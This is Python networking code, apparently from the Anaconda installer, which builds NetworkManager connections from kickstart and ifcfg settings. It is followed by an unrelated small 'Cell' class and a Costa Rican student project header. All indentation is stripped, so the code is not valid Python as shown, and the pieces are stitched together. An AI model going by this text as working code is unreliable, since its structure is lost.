values.append(['vlan', 'parent', networkdata.parent, 's'])
values.append(['connection', 'type', 'vlan', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['vlan', 'interface-name', devname, 's'])
values.append(['vlan', 'id', int(networkdata.vlanid), 'u'])
dev_spec = None
# type "bridge"
elif networkdata.bridgeslaves:
# bridge connection is autoactivated
values.append(['connection', 'type', 'bridge', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['bridge', 'interface-name', devname, 's'])
for opt in networkdata.bridgeopts.split(","):
key, _sep, value = opt.partition("=")
if key == "stp":
if value == "yes":
values.append(['bridge', key, True, 'b'])
elif value == "no":
values.append(['bridge', key, False, 'b'])
continue
try:
value = int(value)
except ValueError:
log.error("Invalid bridge option %s", opt)
continue
values.append(['bridge', key, int(value), 'u'])
for slave in networkdata.bridgeslaves.split(","):
suuid = _add_slave_connection('bridge', slave, devname, networkdata.activate)
added_connections.append((suuid, slave))
dev_spec = None
# type "infiniband"
elif nm.nm_device_type_is_infiniband(devname):
values.append(['infiniband', 'transport-mode', 'datagram', 's'])
values.append(['connection', 'type', 'infiniband', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['connection', 'interface-name', devname, 's'])
dev_spec = None
# type "802-3-ethernet"
else:
mac = _bound_hwaddr_of_device(devname)
if mac:
mac = [int(b, 16) for b in mac.split(":")]
values.append(['802-3-ethernet', 'mac-address', mac, 'ay'])
values.append(['connection', 'type', '802-3-ethernet', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['connection', 'interface-name', devname, 's'])
if blivet.arch.is_s390():
# Add s390 settings
s390cfg = _get_s390_settings(devname)
if s390cfg['SUBCHANNELS']:
subchannels = s390cfg['SUBCHANNELS'].split(",")
values.append(['802-3-ethernet', 's390-subchannels', subchannels, 'as'])
if s390cfg['NETTYPE']:
values.append(['802-3-ethernet', 's390-nettype', s390cfg['NETTYPE'], 's'])
if s390cfg['OPTIONS']:
opts = s390cfg['OPTIONS'].split(" ")
opts_dict = {k:v for k,v in (o.split("=") for o in opts)}
values.append(['802-3-ethernet', 's390-options', opts_dict, 'a{ss}'])
dev_spec = devname
try:
nm.nm_add_connection(values)
except nm.BondOptionsError as e:
log.error(e)
return []
added_connections.insert(0, (con_uuid, dev_spec))
return added_connections
def _bound_hwaddr_of_device(devname):
"""Return hwaddr of the device if it's bound by ifname= dracut boot option
For example ifname=ens3:f4:ce:46:2c:44:7a should bind the device name ens3
to the MAC address (and rename the device in initramfs eventually). If
hwaddress of the device devname is the same as the MAC address, its value
is returned.
:param devname: device name
:type devname: str
:return: hwaddress of the device if bound, or None
:rtype: str or None
"""
ifname_values = flags.cmdline.get("ifname", "").split()
for ifname in ifname_values:
dev, mac = ifname.split(":", 1)
if dev == devname:
try:
hwaddr = nm.nm_device_perm_hwaddress(devname)
except nm.PropertyNotFoundError:
continue
else:
if mac.upper() == hwaddr.upper():
return hwaddr.upper()
else:
log.warning("network: ifname=%s does not match device's hwaddr %s", ifname, hwaddr)
return None
def _get_s390_settings(devname):
cfg = {
'SUBCHANNELS': '',
'NETTYPE': '',
'OPTIONS': ''
}
subchannels = []
for symlink in sorted(glob.glob("/sys/class/net/%s/device/cdev[0-9]*" % devname)):
subchannels.append(os.path.basename(os.readlink(symlink)))
if not subchannels:
return cfg
cfg['SUBCHANNELS'] = ','.join(subchannels)
## cat /etc/ccw.conf
#qeth,0.0.0900,0.0.0901,0.0.0902,layer2=0,portname=FOOBAR,portno=0
#
#SUBCHANNELS="0.0.0900,0.0.0901,0.0.0902"
#NETTYPE="qeth"
#OPTIONS="layer2=1 portname=FOOBAR portno=0"
if not os.path.exists('/run/install/ccw.conf'):
return cfg
with open('/run/install/ccw.conf') as f:
# pylint: disable=redefined-outer-name
for line in f:
if cfg['SUBCHANNELS'] in line:
items = line.strip().split(',')
cfg['NETTYPE'] = items[0]
cfg['OPTIONS'] = " ".join(i for i in items[1:] if '=' in i)
break
return cfg
def _add_slave_connection(slave_type, slave, master, activate, values=None):
values = values or []
#slave_name = "%s slave %d" % (devname, slave_idx)
slave_name = slave
suuid = str(uuid4())
# assume ethernet, TODO: infiniband, wifi, vlan
values.append(['connection', 'uuid', suuid, 's'])
values.append(['connection', 'id', slave_name, 's'])
values.append(['connection', 'slave-type', slave_type, 's'])
values.append(['connection', 'master', master, 's'])
values.append(['connection', 'type', '802-3-ethernet', 's'])
mac = nm.nm_device_perm_hwaddress(slave)
mac = [int(b, 16) for b in mac.split(":")]
values.append(['802-3-ethernet', 'mac-address', mac, 'ay'])
# disconnect slaves
if activate:
try:
nm.nm_disconnect_device(slave)
except nm.DeviceNotActiveError:
pass
# remove ifcfg file
ifcfg_path = find_ifcfg_file_of_device(slave)
if ifcfg_path and os.access(ifcfg_path, os.R_OK):
os.unlink(ifcfg_path)
nm.nm_add_connection(values)
return suuid
def ksdata_from_ifcfg(devname, uuid=None):
if devname not in nm.nm_devices():
return None
if nm.nm_device_is_slave(devname):
return None
if nm.nm_device_type_is_wifi(devname):
# wifi from kickstart is not supported yet
return None
if not uuid:
# Find ifcfg file for the device.
# If the device is active, use uuid of its active connection.
uuid = nm.nm_device_active_con_uuid(devname)
if uuid:
ifcfg_path = find_ifcfg_file([("UUID", uuid)])
else:
# look it up by other values depending on its type
ifcfg_path = find_ifcfg_file_of_device(devname)
if not ifcfg_path:
return None
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
nd = ifcfg_to_ksdata(ifcfg, devname)
if not nd:
return None
if nm.nm_device_type_is_ethernet(devname):
nd.device = devname
elif nm.nm_device_type_is_wifi(devname):
nm.device = ""
elif nm.nm_device_type_is_bond(devname):
nd.device = devname
elif nm.nm_device_type_is_team(devname):
nd.device = devname
elif nm.nm_device_type_is_bridge(devname):
nd.device = devname
elif nm.nm_device_type_is_vlan(devname):
if devname != default_ks_vlan_interface_name(nd.device, nd.vlanid):
nd.interfacename = devname
return nd
def ifcfg_to_ksdata(ifcfg, devname):
from pyanaconda.kickstart import AnacondaKSHandler
handler = AnacondaKSHandler()
kwargs = {}
# no network command for bond slaves
if ifcfg.get("MASTER"):
return None
# no network command for team slaves
if ifcfg.get("TEAM_MASTER"):
return None
# no network command for bridge slaves
if ifcfg.get("BRIDGE"):
return None
# ipv4 and ipv6
if ifcfg.get("ONBOOT") and ifcfg.get("ONBOOT") == "no":
kwargs["onboot"] = False
if ifcfg.get('MTU') and ifcfg.get('MTU') != "0":
kwargs["mtu"] = ifcfg.get('MTU')
# ipv4
if not ifcfg.get('BOOTPROTO'):
kwargs["noipv4"] = True
else:
if iutil.lowerASCII(ifcfg.get('BOOTPROTO')) == 'dhcp':
kwargs["bootProto"] = "dhcp"
if ifcfg.get('DHCPCLASS'):
kwargs["dhcpclass"] = ifcfg.get('DHCPCLASS')
elif ifcfg.get('IPADDR'):
kwargs["bootProto"] = "static"
kwargs["ip"] = ifcfg.get('IPADDR')
netmask = ifcfg.get('NETMASK')
prefix = ifcfg.get('PREFIX')
if not netmask and prefix:
netmask = prefix2netmask(int(prefix))
if netmask:
kwargs["netmask"] = netmask
# note that --gateway is common for ipv4 and ipv6
if ifcfg.get('GATEWAY'):
kwargs["gateway"] = ifcfg.get('GATEWAY')
elif ifcfg.get('IPADDR0'):
kwargs["bootProto"] = "static"
kwargs["ip"] = ifcfg.get('IPADDR0')
prefix = ifcfg.get('PREFIX0')
if prefix:
netmask = prefix2netmask(int(prefix))
kwargs["netmask"] = netmask
# note that --gateway is common for ipv4 and ipv6
if ifcfg.get('GATEWAY0'):
kwargs["gateway"] = ifcfg.get('GATEWAY0')
# ipv6
if (not ifcfg.get('IPV6INIT') or
ifcfg.get('IPV6INIT') == "no"):
kwargs["noipv6"] = True
else:
if ifcfg.get('IPV6_AUTOCONF') in ("yes", ""):
kwargs["ipv6"] = "auto"
else:
if ifcfg.get('IPV6ADDR'):
kwargs["ipv6"] = ifcfg.get('IPV6ADDR')
if ifcfg.get('IPV6_DEFAULTGW') \
and ifcfg.get('IPV6_DEFAULTGW') != "::":
kwargs["ipv6gateway"] = ifcfg.get('IPV6_DEFAULTGW')
if ifcfg.get('DHCPV6C') == "yes":
kwargs["ipv6"] = "dhcp"
# ipv4 and ipv6
dnsline = ''
for key in ifcfg.info.keys():
if iutil.upperASCII(key).startswith('DNS'):
if dnsline == '':
dnsline = ifcfg.get(key)
else:
dnsline += "," + ifcfg.get(key)
if dnsline:
kwargs["nameserver"] = dnsline
if ifcfg.get("ETHTOOL_OPTS"):
kwargs["ethtool"] = ifcfg.get("ETHTOOL_OPTS")
if ifcfg.get("ESSID"):
kwargs["essid"] = ifcfg.get("ESSID")
# hostname
if ifcfg.get("DHCP_HOSTNAME"):
kwargs["hostname"] = ifcfg.get("DHCP_HOSTNAME")
# bonding
# FIXME: dracut has only BOND_OPTS
if ifcfg.get("BONDING_MASTER") == "yes" or ifcfg.get("TYPE") == "Bond":
slaves = get_slaves_from_ifcfgs("MASTER", [devname, ifcfg.get("UUID")])
if slaves:
kwargs["bondslaves"] = ",".join(slaves)
bondopts = ifcfg.get("BONDING_OPTS")
if bondopts:
sep = ","
if sep in bondopts:
sep = ";"
kwargs["bondopts"] = sep.join(bondopts.split())
# vlan
if ifcfg.get("VLAN") == "yes" or ifcfg.get("TYPE") == "Vlan":
kwargs["device"] = ifcfg.get("PHYSDEV")
kwargs["vlanid"] = ifcfg.get("VLAN_ID")
# bridging
if ifcfg.get("TYPE") == "Bridge":
slaves = get_slaves_from_ifcfgs("BRIDGE", [devname, ifcfg.get("UUID")])
if slaves:
kwargs["bridgeslaves"] = ",".join(slaves)
bridgeopts = ifcfg.get("BRIDGING_OPTS").replace('_', '-').split()
if ifcfg.get("STP"):
bridgeopts.append("%s=%s" % ("stp", ifcfg.get("STP")))
if ifcfg.get("DELAY"):
bridgeopts.append("%s=%s" % ("forward-delay", ifcfg.get("DELAY")))
if bridgeopts:
kwargs["bridgeopts"] = ",".join(bridgeopts)
# pylint: disable=no-member
nd = handler.NetworkData(**kwargs)
# teaming
if ifcfg.get("TYPE") == "Team" or ifcfg.get("DEVICETYPE") == "Team":
slaves = get_team_slaves([devname, ifcfg.get("UUID")])
for dev, cfg in slaves:
nd.teamslaves.append((dev, cfg))
teamconfig = nm.nm_device_setting_value(devname, "team", "config")
if teamconfig:
nd.teamconfig = teamconfig
return nd
def hostname_ksdata(hostname):
from pyanaconda.kickstart import AnacondaKSHandler
handler = AnacondaKSHandler()
# pylint: disable=no-member
return handler.NetworkData(hostname=hostname, bootProto="")
def find_ifcfg_file_of_device(devname, root_path=""):
ifcfg_path = None
if devname not in nm.nm_devices():
return None
if nm.nm_device_type_is_wifi(devname):
ssid = nm.nm_device_active_ssid(devname)
if ssid:
ifcfg_path = find_ifcfg_file([("ESSID", ssid)])
elif nm.nm_device_type_is_bond(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_team(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_vlan(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_bridge(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_infiniband(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_ethernet(devname):
try:
hwaddr = nm.nm_device_perm_hwaddress(devname)
except nm.PropertyNotFoundError:
hwaddr = None
if hwaddr:
hwaddr_check = lambda mac: mac.upper() == hwaddr.upper()
nonempty = lambda x: x
# slave configration created in GUI takes precedence
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check),
("MASTER", nonempty)],
root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check),
("TEAM_MASTER", nonempty)],
root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check),
("BRIDGE", nonempty)],
root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check)], root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("DEVICE", devname)], root_path)
if not ifcfg_path:
if blivet.arch.is_s390():
# s390 setting generated in dracut with net.ifnames=0
# has neither DEVICE nor HWADDR (#1249750)
ifcfg_path = find_ifcfg_file([("NAME", devname)], root_path)
else:
log.debug("network: ifcfg file for %s not found", devname)
return ifcfg_path
def find_ifcfg_file(values, root_path=""):
for filepath in _ifcfg_files(os.path.normpath(root_path+netscriptsDir)):
ifcfg = IfcfgFile(filepath)
ifcfg.read()
for key, value in values:
if callable(value):
if not value(ifcfg.get(key)):
break
else:
if ifcfg.get(key) != value:
break
else:
return filepath
return None
def get_slaves_from_ifcfgs(master_option, master_specs):
"""List of slaves of master specified by master_specs in master_option.
master_option is ifcfg option containing spec of master
master_specs is a list containing device name of master (dracut)
and/or master's connection uuid
"""
slaves = []
for filepath in _ifcfg_files(netscriptsDir):
ifcfg = IfcfgFile(filepath)
ifcfg.read()
master = ifcfg.get(master_option)
if master in master_specs:
device = ifcfg.get("DEVICE")
if device:
slaves.append(device)
else:
hwaddr = ifcfg.get("HWADDR")
for devname in nm.nm_devices():
try:
h = nm.nm_device_property(devname, "PermHwAddress")
except nm.PropertyNotFoundError:
log.debug("can't get PermHwAddress of devname %s", devname)
continue
if h.upper() == hwaddr.upper():
slaves.append(devname)
break
return slaves
def get_team_slaves(master_specs):
"""List of slaves of master specified by master_specs (name, opts).
master_specs is a list containing device name of master (dracut)
and/or master's connection uuid
"""
slaves = []
for master in master_specs:
slave_settings = nm.nm_get_settings(master, "connection", "master")
for settings in slave_settings:
try:
cfg = settings["team-port"]["config"]
except KeyError:
cfg = ""
devname = settings["connection"].get("interface-name")
#nm-c-e doesn't save device name
# TODO: wifi, infiniband
if not devname:
ty = settings["connection"]["type"]
if ty == "802-3-ethernet":
hwaddr = settings["802-3-ethernet"]["mac-address"]
hwaddr = ":".join("%02X" % b for b in hwaddr)
devname = nm.nm_hwaddr_to_device_name(hwaddr)
if devname:
slaves.append((devname, cfg))
else:
uuid = settings["connection"].get("uuid")
log.debug("network: can't get team slave device name of %s", uuid)
return slaves
def ibftIface():
iface = ""
ipopt = flags.cmdline.get('ip')
# Examples (dhcp, static):
# ibft0:dhcp
# 10.34.102.244::10.34.102.54:255.255.255.0::ibft0:none
if ipopt:
for item in ipopt.split(":"):
if item.startswith('ibft'):
iface = item
break
return iface
def ifaceForHostIP(host):
route = iutil.execWithCapture("ip", ["route", "get", "to", host])
if not route:
log.error("Could not get interface for route to %s", host)
return ""
routeInfo = route.split()
if routeInfo[0] != host or len(routeInfo) < 5 or \
"dev" not in routeInfo or routeInfo.index("dev") > 3:
log.error('Unexpected "ip route get to %s" reply: %s', host, routeInfo)
return ""
return routeInfo[routeInfo.index("dev") + 1]
def default_route_device(family="inet"):
routes = iutil.execWithCapture("ip", [ "-f", family, "route", "show"])
if not routes:
log.debug("Could not get default %s route device", family)
return None
for line in routes.split("\n"):
if line.startswith("default"):
parts = line.split()
if len(parts) >= 5 and parts[3] == "dev":
return parts[4]
else:
log.debug("Could not parse default %s route device", family)
return None
return None
def copyFileToPath(fileName, destPath='', overwrite=False):
if not os.path.isfile(fileName):
return False
destfile = os.path.join(destPath, fileName.lstrip('/'))
if (os.path.isfile(destfile) and not overwrite):
return False
if not os.path.isdir(os.path.dirname(destfile)):
iutil.mkdirChain(os.path.dirname(destfile))
shutil.copy(fileName, destfile)
return True
def copyIfcfgFiles(destPath):
files = os.listdir(netscriptsDir)
for cfgFile in files:
if cfgFile.startswith(("ifcfg-", "keys-", "route-")):
srcfile = os.path.join(netscriptsDir, cfgFile)
copyFileToPath(srcfile, destPath)
def copyDhclientConfFiles(destPath):
for devName in nm.nm_devices():
dhclientfile = os.path.join("/etc/dhcp/dhclient-%s.conf" % devName)
copyFileToPath(dhclientfile, destPath)
def ks_spec_to_device_name(ksspec=""):
"""
Find the first network device which matches the kickstart specification.
Will not match derived types such as bonds and vlans.
:param ksspec: kickstart-specified device name
:returns: a string naming a physical device, or "" meaning none matched
:rtype: str
"""
bootif_mac = ''
if ksspec == 'bootif' and "BOOTIF" in flags.cmdline:
bootif_mac = flags.cmdline["BOOTIF"][3:].replace("-", ":").upper()
for dev in sorted(nm.nm_devices()):
# "eth0"
if ksspec == dev:
break
# "link" - match the first device which is plugged (has a carrier)
elif ksspec == 'link':
try:
link_up = nm.nm_device_carrier(dev)
except ValueError as e:
log.debug("ks_spec_to_device_name: %s", e)
continue
if link_up:
ksspec = dev
break
# "XX:XX:XX:XX:XX:XX" (mac address)
elif ':' in ksspec:
try:
hwaddr = nm.nm_device_valid_hwaddress(dev)
except ValueError as e:
log.debug("ks_spec_to_device_name: %s", e)
continue
if ksspec.lower() == hwaddr.lower():
ksspec = dev
break
# "bootif" and BOOTIF==XX:XX:XX:XX:XX:XX
elif ksspec == 'bootif':
try:
hwaddr = nm.nm_device_valid_hwaddress(dev)
except ValueError as e:
log.debug("ks_spec_to_device_name: %s", e)
continue
if bootif_mac.lower() == hwaddr.lower():
ksspec = dev
break
return ksspec
def set_hostname(hn):
if can_touch_runtime_system("set hostname", touch_live=True):
log.info("setting installation environment host name to %s", hn)
iutil.execWithRedirect("hostnamectl", ["set-hostname", hn])
def write_hostname(rootpath, ksdata, overwrite=False):
cfgfile = os.path.normpath(rootpath + hostnameFile)
if (os.path.isfile(cfgfile) and not overwrite):
return False
f = open(cfgfile, "w")
f.write("%s\n" % ksdata.network.hostname)
f.close()
return True
def disableIPV6(rootpath):
cfgfile = os.path.normpath(rootpath + ipv6ConfFile)
if ('noipv6' in flags.cmdline
and all(nm.nm_device_setting_value(dev, "ipv6", "method") == "ignore"
for dev in nm.nm_devices() if nm.nm_device_type_is_ethernet(dev))):
log.info('Disabling ipv6 on target system')
with open(cfgfile, "a") as f:
f.write("# Anaconda disabling ipv6 (noipv6 option)\n")
f.write("net.ipv6.conf.all.disable_ipv6=1\n")
f.write("net.ipv6.conf.default.disable_ipv6=1\n")
def autostartFCoEDevices(rootpath, storage, ksdata):
for devname in nm.nm_devices():
if usedByFCoE(devname, storage):
ifcfg_path = find_ifcfg_file_of_device(devname, root_path=rootpath)
if not ifcfg_path:
log.warning("autoconnectFCoEDevices: ifcfg file for %s not found", devname)
continue
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
ifcfg.set(('ONBOOT', 'yes'))
ifcfg.write()
log.debug("setting ONBOOT=yes for network device %s used by fcoe", devname)
for nd in ksdata.network.network:
if nd.device == devname:
nd.onboot = True
break
def usedByFCoE(iface, storage):
for d in storage.devices:
if (isinstance(d, FcoeDiskDevice) and
d.nic == iface):
return True
return False
def write_sysconfig_network(rootpath, overwrite=False):
cfgfile = os.path.normpath(rootpath + networkConfFile)
if (os.path.isfile(cfgfile) and not overwrite):
return False
with open(cfgfile, "w") as f:
f.write("# Created by anaconda\n")
return True
def write_network_config(storage, ksdata, instClass, rootpath):
# overwrite previous settings for LiveCD or liveimg installations
overwrite = flags.livecdInstall or ksdata.method.method == "liveimg"
write_hostname(rootpath, ksdata, overwrite=overwrite)
set_hostname(ksdata.network.hostname)
write_sysconfig_network(rootpath, overwrite=overwrite)
disableIPV6(rootpath)
copyIfcfgFiles(rootpath)
copyDhclientConfFiles(rootpath)
copyFileToPath("/etc/resolv.conf", rootpath, overwrite=overwrite)
instClass.setNetworkOnbootDefault(ksdata)
autostartFCoEDevices(rootpath, storage, ksdata)
def update_hostname_data(ksdata, hostname):
log.debug("updating host name %s", hostname)
hostname_found = False
for nd in ksdata.network.network:
if nd.hostname:
nd.hostname = hostname
hostname_found = True
if not hostname_found:
nd = hostname_ksdata(hostname)
ksdata.network.network.append(nd)
def get_device_name(network_data):
"""
Find the first network device which matches the kickstart specification.
:param network_data: A pykickstart NetworkData object
:returns: a string naming a physical device, or "" meaning none matched
:rtype: str
"""
ksspec = network_data.device or ""
dev_name = ks_spec_to_device_name(ksspec)
if not dev_name:
return ""
if dev_name not in nm.nm_devices():
if not any((network_data.vlanid, network_data.bondslaves, network_data.teamslaves, network_data.bridgeslaves)):
return ""
if network_data.vlanid:
network_data.parent = dev_name
dev_name = network_data.interfacename or default_ks_vlan_interface_name(network_data.parent, network_data.vlanid)
return dev_name
def setOnboot(ksdata):
updated_devices = []
for network_data in ksdata.network.network:
devname = get_device_name(network_data)
if not devname:
log.warning("network: set ONBOOT: --device %s does not exist", network_data.device)
continue
updated_devices.append(devname)
try:
nm.nm_update_settings_of_device(devname, [['connection', 'autoconnect', network_data.onboot, None]])
except (nm.SettingsNotFoundError, nm.UnknownDeviceError) as e:
log.debug("setOnboot: %s", e)
return updated_devices
def apply_kickstart(ksdata):
applied_devices = []
for i, network_data in enumerate(ksdata.network.network):
# TODO: wireless not supported yet
if network_data.essid:
continue
dev_name = get_device_name(network_data)
if not dev_name:
log.warning("network: apply kickstart: --device %s does not exist", network_data.device)
continue
ifcfg_path = find_ifcfg_file_of_device(dev_name)
if ifcfg_path:
with open(ifcfg_path, 'r') as f:
# If we have kickstart ifcfg from initramfs
if "Generated by parse-kickstart" in f.read():
# and we should activate the device
if i == 0 or network_data.activate:
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
con_uuid = ifcfg.get("UUID")
# and the ifcfg had not been already applied to device by NM
if con_uuid != nm.nm_device_active_con_uuid(dev_name):
# apply it overriding configuration generated by NM
# taking over connection activated in initramfs
log.debug("network: kickstart - reactivating device %s with %s", dev_name, con_uuid)
try:
nm.nm_activate_device_connection(dev_name, con_uuid)
except nm.UnknownConnectionError:
log.warning("network: kickstart - can't activate connection %s on %s",
con_uuid, dev_name)
continue
# If we don't have kickstart ifcfg from initramfs the command was added
# in %pre section after switch root, so apply it now
applied_devices.append(dev_name)
if ifcfg_path:
# if the device was already configured in initramfs update the settings
log.debug("network: pre kickstart - updating settings of device %s", dev_name)
con_uuid = update_settings_with_ksdata(dev_name, network_data)
added_connections = [(con_uuid, dev_name)]
else:
log.debug("network: pre kickstart - adding connection for %s", dev_name)
# Virtual devices (eg vlan, bond) return dev_name == None
added_connections = add_connection_for_ksdata(network_data, dev_name)
if network_data.activate:
for con_uuid, dev_name in added_connections:
try:
nm.nm_activate_device_connection(dev_name, con_uuid)
except (nm.UnknownConnectionError, nm.UnknownDeviceError) as e:
log.warning("network: pre kickstart: can't activate connection %s on %s: %s",
con_uuid, dev_name, e)
return applied_devices
def networkInitialize(ksdata):
if not can_touch_runtime_system("networkInitialize", touch_live=True):
return
log.debug("network: devices found %s", nm.nm_devices())
logIfcfgFiles("network initialization")
devnames = apply_kickstart(ksdata)
if devnames:
msg = "kickstart pre section applied for devices %s" % devnames
log.debug("network: %s", msg)
logIfcfgFiles(msg)
devnames = dumpMissingDefaultIfcfgs()
if devnames:
msg = "missing ifcfgs created for devices %s" % devnames
log.debug("network: %s", msg)
logIfcfgFiles(msg)
# For kickstart network --activate option we set ONBOOT=yes
# in dracut to get devices activated by NM. The real network --onboot
# value is set here.
devnames = setOnboot(ksdata)
if devnames:
msg = "setting real kickstart ONBOOT value for devices %s" % devnames
log.debug("network: %s", msg)
logIfcfgFiles(msg)
if ksdata.network.hostname is None:
hostname = getHostname()
update_hostname_data(ksdata, hostname)
def _get_ntp_servers_from_dhcp(ksdata):
"""Check if some NTP servers were returned from DHCP and set them
to ksdata (if not NTP servers were specified in the kickstart)"""
ntp_servers = nm.nm_ntp_servers_from_dhcp()
log.info("got %d NTP servers from DHCP", len(ntp_servers))
hostnames = []
for server_address in ntp_servers:
try:
hostname = socket.gethostbyaddr(server_address)[0]
except socket.error:
# getting hostname failed, just use the address returned from DHCP
log.debug("getting NTP server host name failed for address: %s",
server_address)
hostname = server_address
hostnames.append(hostname)
# check if some NTP servers were specified from kickstart
if not ksdata.timezone.ntpservers \
and not (flags.imageInstall or flags.dirInstall):
# no NTP servers were specified, add those from DHCP
ksdata.timezone.ntpservers = hostnames
def _wait_for_connecting_NM():
"""If NM is in connecting state, wait for connection.
:return: ``True`` NM has got connection otherwise ``False``
:rtype: bool
"""
if nm.nm_is_connected():
return True
if nm.nm_is_connecting():
log.debug("waiting for connecting NM (dhcp?)")
else:
return False
i = 0
while nm.nm_is_connecting() and i < constants.NETWORK_CONNECTION_TIMEOUT:
i += constants.NETWORK_CONNECTED_CHECK_INTERVAL
time.sleep(constants.NETWORK_CONNECTED_CHECK_INTERVAL)
if nm.nm_is_connected():
log.debug("connected, waited %d seconds", i)
return True
log.debug("not connected, waited %d of %d secs", i, constants.NETWORK_CONNECTION_TIMEOUT)
return False
def wait_for_network_devices(devices, timeout=constants.NETWORK_CONNECTION_TIMEOUT):
devices = set(devices)
i = 0
log.debug("waiting for connection of devices %s for iscsi", devices)
while i < timeout:
if not devices - set(nm.nm_activated_devices()):
return True
i += 1
time.sleep(1)
return False
def wait_for_connecting_NM_thread(ksdata):
"""This function is called from a thread which is run at startup
to wait for Network Manager to connect."""
# connection (e.g. auto default dhcp) is activated by NM service
connected = _wait_for_connecting_NM()
if connected:
if ksdata.network.hostname == DEFAULT_HOSTNAME:
hostname = getHostname()
update_hostname_data(ksdata, hostname)
_get_ntp_servers_from_dhcp(ksdata)
with network_connected_condition:
global network_connected
network_connected = connected
network_connected_condition.notify_all()
def wait_for_connectivity(timeout=constants.NETWORK_CONNECTION_TIMEOUT):
"""Wait for network connectivty to become available
:param timeout: how long to wait in seconds
:type timeout: integer of float"""
connected = False
network_connected_condition.acquire()
# if network_connected is None, network connectivity check
# has not yet been run or is in progress, so wait for it to finish
if network_connected is None:
# wait releases the lock and reacquires it once the thread is unblocked
network_connected_condition.wait(timeout=timeout)
connected = network_connected
# after wait() unblocks, we get the lock back,
# so we need to release it
network_connected_condition.release()
return connected
def status_message():
""" A short string describing which devices are connected. """
msg = _("Unknown")
state = nm.nm_state()
if state == NetworkManager.State.CONNECTING:
msg = _("Connecting...")
elif state == NetworkManager.State.DISCONNECTING:
msg = _("Disconnecting...")
else:
active_devs = [d for d in nm.nm_activated_devices()
if not is_libvirt_device(d)]
if active_devs:
slaves = {}
ssids = {}
# first find slaves and wireless aps
for devname in active_devs:
slaves[devname] = nm.nm_device_slaves(devname) or []
if nm.nm_device_type_is_wifi(devname):
ssids[devname] = nm.nm_device_active_ssid(devname) or ""
all_slaves = set(itertools.chain.from_iterable(slaves.values()))
nonslaves = [dev for dev in active_devs if dev not in all_slaves]
if len(nonslaves) == 1:
devname = nonslaves[0]
if nm.nm_device_type_is_ethernet(devname):
msg = _("Wired (%(interface_name)s) connected") \
% {"interface_name": devname}
elif nm.nm_device_type_is_wifi(devname):
msg = _("Wireless connected to %(access_point)s") \
% {"access_point" : ssids[devname]}
elif nm.nm_device_type_is_bond(devname):
msg = _("Bond %(interface_name)s (%(list_of_slaves)s) connected") \
% {"interface_name": devname, \
"list_of_slaves": ",".join(slaves[devname])}
elif nm.nm_device_type_is_team(devname):
msg = _("Team %(interface_name)s (%(list_of_slaves)s) connected") \
% {"interface_name": devname, \
"list_of_slaves": ",".join(slaves[devname])}
elif nm.nm_device_type_is_bridge(devname):
msg = _("Bridge %(interface_name)s (%(list_of_slaves)s) connected") \
% {"interface_name": devname, \
"list_of_slaves": ",".join(slaves[devname])}
elif nm.nm_device_type_is_vlan(devname):
parent = nm.nm_device_setting_value(devname, "vlan", "parent")
vlanid = nm.nm_device_setting_value(devname, "vlan", "id")
msg = _("VLAN %(interface_name)s (%(parent_device)s, ID %(vlanid)s) connected") \
% {"interface_name": devname, "parent_device": parent, "vlanid": vlanid}
elif len(nonslaves) > 1:
devlist = []
for devname in nonslaves:
if nm.nm_device_type_is_ethernet(devname):
devlist.append("%s" % devname)
elif nm.nm_device_type_is_wifi(devname):
devlist.append("%s" % ssids[devname])
elif nm.nm_device_type_is_bond(devname):
devlist.append("%s (%s)" % (devname, ",".join(slaves[devname])))
elif nm.nm_device_type_is_team(devname):
devlist.append("%s (%s)" % (devname, ",".join(slaves[devname])))
elif nm.nm_device_type_is_bridge(devname):
devlist.append("%s (%s)" % (devname, ",".join(slaves[devname])))
elif nm.nm_device_type_is_vlan(devname):
devlist.append("%s" % devname)
msg = _("Connected: %(list_of_interface_names)s") \
% {"list_of_interface_names": ", ".join(devlist)}
else:
msg = _("Not connected")
if not nm.nm_devices():
msg = _("No network devices available")
return msg
def default_ks_vlan_interface_name(parent, vlanid):
return "%s.%s" % (parent, vlanid)
def has_some_wired_autoconnect_device():
"""Is there a wired network device with autoconnect?"""
for dev in nm.nm_devices():
if nm.nm_device_type_is_wifi(dev):
continue
try:
onboot = nm.nm_device_setting_value(dev, "connection", "autoconnect")
except nm.SettingsNotFoundError:
continue
# None means the setting was not found, which means NM is using
# default (True)
if onboot == True or onboot is None:
return True
return False
def update_onboot_value(devname, value, ksdata):
"""Update onboot value in ifcfg files and ksdata"""
log.debug("network: setting ONBOOT value of %s to %s", devname, value)
ifcfg_path = find_ifcfg_file_of_device(devname, root_path=iutil.getSysroot())
if not ifcfg_path:
log.debug("network: can't find ifcfg file of %s", devname)
return
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
ifcfg.set(('ONBOOT', 'yes'))
ifcfg.write()
for nd in ksdata.network.network:
if nd.device == devname:
nd.onboot = True
break
def is_using_team_device():
return any(nm.nm_device_type_is_team(d) for d in nm.nm_devices())
def is_libvirt_device(iface):
return iface.startswith("virbr")
|
from random import random
class Cell:
def __init__(self, fitness):
self.fitness = fitness
self.survivability = self.fitness
def live(self, environment_modifier):
self.survivability = self.fitness + environment_modifier
|
"""
UNIVERSIDAD DE COSTA RICA Escuela de Ingeniería Eléctrica
IE0499 | Proyecto Eléctrico
Mario Alberto Castresana Avendaño
A41267
Programa: BVH_TuneUp
-------------------------------------------------------------------------------
